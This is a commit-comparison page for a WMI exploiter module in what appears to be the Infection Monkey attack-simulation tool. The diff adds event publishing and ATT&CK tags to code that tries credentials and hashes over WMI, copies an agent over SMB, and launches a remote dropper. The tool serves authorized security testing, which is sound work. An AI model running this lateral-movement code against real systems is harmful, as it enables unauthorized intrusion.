Compare commits

...

4 Commits

Author SHA1 Message Date
Ilija Lazoroski d1427117c7 Agent: Add successful exploitation in WMI 2022-10-07 14:58:32 +02:00
Ilija Lazoroski 6950dcdf0c Agent: Change propagation timestamp in WMI 2022-10-07 14:49:49 +02:00
Ilija Lazoroski c09c2c2127 Agent: Add attack technique tags from WMIExploiter 2022-10-07 14:12:52 +02:00
Ilija Lazoroski ed191bcf61 Agent: Publish events from WMI 2022-10-07 13:55:49 +02:00
1 changed files with 32 additions and 15 deletions

View File

@ -2,10 +2,16 @@ import logging
import ntpath import ntpath
import socket import socket
import traceback import traceback
from time import time
from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.rpcrt import DCERPCException
from common.credentials import get_plaintext from common.credentials import get_plaintext
from common.tags import (
T1021_ATTACK_TECHNIQUE_TAG,
T1105_ATTACK_TECHNIQUE_TAG,
T1110_ATTACK_TECHNIQUE_TAG,
)
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.exploit.tools.smb_tools import SmbTools
@ -21,10 +27,15 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
WMI_EXPLOITER_TAG = "wmi-exploiter"
class WmiExploiter(HostExploiter): class WmiExploiter(HostExploiter):
_EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)" _EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"
_EXPLOITER_TAGS = (WMI_EXPLOITER_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG)
_PROPAGATION_TAGS = (WMI_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
@WmiTools.impacket_user @WmiTools.impacket_user
@WmiTools.dcom_wrap @WmiTools.dcom_wrap
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
@ -44,6 +55,7 @@ class WmiExploiter(HostExploiter):
wmi_connection = WmiTools.WmiConnection() wmi_connection = WmiTools.WmiConnection()
timestamp = time()
try: try:
wmi_connection.connect( wmi_connection.connect(
self.host, self.host,
@ -55,26 +67,34 @@ class WmiExploiter(HostExploiter):
) )
except AccessDeniedException: except AccessDeniedException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug(f"Failed connecting to {self.host} using WMI") error_message = f"Failed connecting to {self.host} using WMI"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
continue continue
except DCERPCException: except DCERPCException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug(f"Failed connecting to {self.host} using WMI") logger.debug(f"Failed connecting to {self.host} using WMI")
self._publish_exploitation_event(timestamp, False, error_message=error_message)
continue continue
except socket.error: except socket.error:
logger.debug(f"Network error in WMI connection to {self.host}") error_message = f"Network error in WMI connection to {self.host}"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return self.exploit_result return self.exploit_result
except Exception as exc: except Exception as exc:
logger.debug( error_message = (
f"Unknown WMI connection error to {self.host}: " f"Unknown WMI connection error to {self.host}: "
f"{exc} {traceback.format_exc()}" f"{exc} {traceback.format_exc()}"
) )
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return self.exploit_result return self.exploit_result
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
self._publish_exploitation_event(timestamp, True, error_message=error_message)
downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"]) downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
@ -84,6 +104,7 @@ class WmiExploiter(HostExploiter):
target_path = get_agent_dst_path(self.host) target_path = get_agent_dst_path(self.host)
propagation_timestamp = time()
remote_full_path = SmbTools.copy_file( remote_full_path = SmbTools.copy_file(
self.host, self.host,
downloaded_agent, downloaded_agent,
@ -119,27 +140,23 @@ class WmiExploiter(HostExploiter):
if (0 != result.ProcessId) and (not result.ReturnValue): if (0 != result.ProcessId) and (not result.ReturnValue):
logger.info( logger.info(
"Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)", f"Executed dropper '{remote_full_path}' on remote victim {self.host} "
remote_full_path, f"(pid={result.ProcessId}, cmdline={cmdline})"
self.host,
result.ProcessId,
cmdline,
) )
self.add_vuln_port(port="unknown") self.add_vuln_port(port="unknown")
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
self._publish_propagation_event(propagation_timestamp, True)
else: else:
error_message = ( error_message = (
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, " f"Error executing dropper '{remote_full_path}' on remote victim {self.host} "
"cmdline=%r)", f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})"
remote_full_path,
self.host,
result.ProcessId,
result.ReturnValue,
cmdline,
) )
logger.debug(error_message) logger.debug(error_message)
self.exploit_result.error_message = error_message self.exploit_result.error_message = error_message
self._publish_propagation_event(
propagation_timestamp, False, error_message=error_message
)
result.RemRelease() result.RemRelease()
wmi_connection.close() wmi_connection.close()